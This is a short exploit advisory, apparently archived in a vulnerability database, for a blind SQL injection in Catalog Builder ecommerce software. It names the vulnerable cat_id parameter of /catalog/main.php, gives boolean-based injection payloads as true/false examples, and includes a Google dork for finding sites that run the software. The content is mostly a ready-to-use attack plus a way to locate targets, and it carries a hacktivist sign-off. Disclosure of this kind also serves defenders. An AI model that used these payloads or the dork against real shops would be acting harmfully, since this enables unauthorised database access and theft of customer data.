Catalog Builder - Ecommerce Software - Blind SQL Injection

🗓️ 01 Jul 2014 00:00:00Reported by RootType

Catalog Builder Ecommerce Blind SQL Injection Vulnerabilit


                                                +------------------------------------------------------------------------------------------+
|-------[ Catalog Builder - Ecommerce Software - Blind SQL Injection Vulnerability ]-------|
+------------------------------------------------------------------------------------------+
[+] Google Dork hint: inurl:&#39;/catalog/main.php?cat_id=&#39;
[+] Date: 16.06.2011
[+] Author: takeshix
[+] Author Contact: [email protected]
[+] Software Link: http://www.catalogbuilder.ca/catalog/main.php
[+] Tested on: Fedora
[+] Platform: PHP
--------------------------------------------------------------------------------------------

vulnerable url:

/catalog/main.php?cat_id=[blind sqli]

example:

http://localhost/catalog/main.php?cat_id=1&#39; AND 1337=1337 AND &#39;takeshix&#39;=&#39;takeshix true
http://localhost/catalog/main.php?cat_id=1&#39; AND 1337=1337 AND &#39;takeshix&#39;=&#39;takeshixx false
	

--------------------------------------------------------------------------------------------
[+] Greez to some members of UNITS & hackademics & DSU
+------------------------------------------------------------------------------------------+
|-------------------------------------[ hacktivistas ]-------------------------------------|
+------------------------------------------------------------------------------------------+

01 Jul 2014 00:00Current

7.1High risk

Vulners AI Score7.1